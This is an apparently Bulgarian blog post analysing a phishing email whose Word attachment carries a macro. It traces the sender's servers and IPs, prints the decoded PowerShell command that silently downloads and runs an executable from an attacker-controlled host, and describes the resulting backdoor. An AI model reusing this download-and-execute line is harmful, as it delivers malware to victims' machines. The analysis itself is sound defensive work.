Анализ на Izp.list021011357.doc

Square
Посоченият в заглавието файл е от фишинг мейл с прикачен файл. Това не е новост, но за първи път ще публикувам анализ на нещо подобно.

Izp.list021011357 phishing mailНа снимката по-горе се вижда мейлът, с който се разпространява зловредният файл. Самият e-mail, „от който идва“, си е съвсем истински, също като домейнът. Ако отворите „milenbazinski.com“, ще се зареди сайтът на ЧСИ Милен Бъзински.

Данни от мейла

Според мета данните, изпращачът е „office@milenbazinski.com“, но сървърът, от който е получено съобщението, е „blue.gkostov.com“ с IP адрес 168.119.162.24. Справка показва, че „gkostov.com“ се хоства на различни от посочения адреси, собственост на компанията Cloudflare:

host gkostov.com
gkostov.com has address 104.21.66.110
gkostov.com has address 172.67.159.114

А използваният за изпращане адрес е частно IP в Германия. Към момента на писане на публикацията на този адрес работи Apache2 Debian сървър, срещан най-често в Liunx базираните системи, използвани за одит на киберсигурността и хакерстване, като Kali Linux и Parrot OS.

За да не размивам публикацията, предоставям линк към текстови файл с  whois информация за IP 168.119.162.24 към 7-ми април 2021г. whois_168_119_162_24.

Анализ на файла Izp.list021011357.doc

Izp.list021011357.doc е Word документ в стандарта doc 2003 – 2007 с включен макрос в него. По принцип, в по-новите системи те са забранени по подразбиране. Принципите са хубаво нещо, но аз се сещам за поне 3 институции, където те са разрешени и макросът би се изпълнил без предупреждение.

Макрос

Izp.List macro

Макросът е неразбираем за човек без опит. Основното в него е ред 15. Той съдържа криптирана команда, която се изпълнява чрез cmd.exe.

powershell.exe -executionpolicy bypass -W Hidden -command
(new-object System.Net.WebClient).DownloadFile(‘http://sev.milenbazinski.me:2095/ref/g6.exe’,$env:Temp+’\rr.exe’);
(New-Object -com Shell.Application).ShellExecute($env:Temp+’\rr.exe’)

На кратко:

  1. Стартира се скрит прозорец PowerShell
  2. Сваля се файлът „g6.exe“ от ‘http://sev.milenbazinski.me:2095/ref/g6.exe’ и се запазва в Temp директорията на потребителя като „rr.exe“
  3. Стартира „rr.exe“

Проверка на „milenbazinski.me“ сочи, че сайтът се хоства на IP адрес „49.12.44.116“, който е предоставен от компания APNIC, търгуваща на адреси за азиатския пасифик. Самият адрес е задънена улица, защото е виртуален и не води до физическа локация, а получаването на информация за собственика е малко вероятно.

Информация за „49.12.44.116“ към 7-ми април 2021г.: whois_49_12_44_116

Тук е важно да отбележим две неща:

  1. „sev.milenbazinski.me“ не е „milenbazinski.com“. Това е съвсем различен домейн в различна зона, „me“ вместо „com“. Т.е. зловредният файл не се сваля от сайта на ЧСИ-то, а от друг сайт.
  2. За IP „49.12.44.116“ е платено, вероятно с кредитна карта, която си има конкретен собственик. Възможно е данните за картата да са откраднати, но също е възможно самият хакер да е платил със собствената си карта.

Сваленото и стартирано rr.exe

Файлът се идентифицира като „PromSoft_update.exe“, собственост на фирма „PromSoft Ltd“, българска компания за счетоводен софтуер. Самата компания също е жертва и няма нищо общо с произхода на зловредния софтуер.

Приложението има простичка задача – да разпъне „fers.exe“ в профила на потребителя и да го интегрира в системата като стандартен Windows процес.

Заедно с „fers.exe“ се разопакова и ключ и модул за шифроване.

Fers.exe

VirusTotal fers.exe

Новоразпънатото приложение носи същия отпечатък като „rr.exe“. Това означава, че двете са създадени на една и съща система от конкретен потребител. Самото приложение се категоризира като „Backdoor“ или „троянски кон“. Целта е да осигури постоянен достъп на хакера до системата. Наличието на ключ и модул за шифриране говори, че вероятно ще бъде използвано и за криптиране на системата.

Интегрирано в Windows-а като процес, „fers.exe“ ще се стартира всеки път автоматично и незабележимо, което ще гарантира достъпа на хакера, давайки му администраторски права.

Заключение

Направеният анализ дава достатъчно данни, за да се разбере кой е хакерът. Не е ясно дали е потребител от Германия с IP „168.119.162.24“ или това ще се окаже поредната брънка, но е достатъчно за проверка. Важно е да се провери и кой е заплатил за виртуалното IP на „APNIC“. Ако се окаже, че лицето, ползвател на IP „168.119.162.24“ е заплатило за виртуалния адрес или пък плащането е извършено от неговото IP, тогава всичко ще е ясно. Тук простата аритметика ще свърши работа, 2 и 2 винаги прави 4. Разбира се, по-нататъшни действия са работа на разследващите органи.

За самия хак са вложени доста усилия, но от един човек. Уърдовският файл е бил модифициран, вероятно от предишен такъв с подобна цел. Всички мета данни са изтрити, за да не водят до конкретен собственик. Основна цел на хакера са стари и занемарени системи, които не се поддържат. След (зло)употребата им по преценка на хакера, това може да включва източване на сметки и лични данни, вероятно ще бъдат криптирани, а потребителите им – рекетирани. Вероятността да бъдат декриптирани след плащане е малка. Затова не плащайте и не преговаряйте с терористи.

Към момента на писане на тази публикация „http://sev.milenbazinski.me:2095/ref/g6.exe“ вече е недостъпно, но все пак, не се опитвайте да го отворите. Успешното зареждане може да е опасно за вашия компютър и банкова сметка.

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *